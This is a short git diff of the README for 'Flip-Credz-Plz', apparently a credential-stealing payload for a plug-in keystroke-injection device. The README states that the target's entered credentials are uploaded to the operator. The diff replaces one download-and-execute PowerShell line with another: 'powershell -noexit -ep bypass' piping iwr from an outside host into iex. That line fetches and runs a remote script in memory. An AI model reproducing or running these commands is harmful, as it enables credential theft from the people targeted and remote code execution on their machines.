diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md index 2cbaffb..8a4187c 100644 --- a/Payloads/Flip-Credz-Plz/README.md +++ b/Payloads/Flip-Credz-Plz/README.md @@ -42,7 +42,7 @@ Once the target enters their credentials their information will be uploaded to y * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +powershell -noexit -ep bypass $db='';iwr https://jakoby.lol/35k | iex ```

(back to top)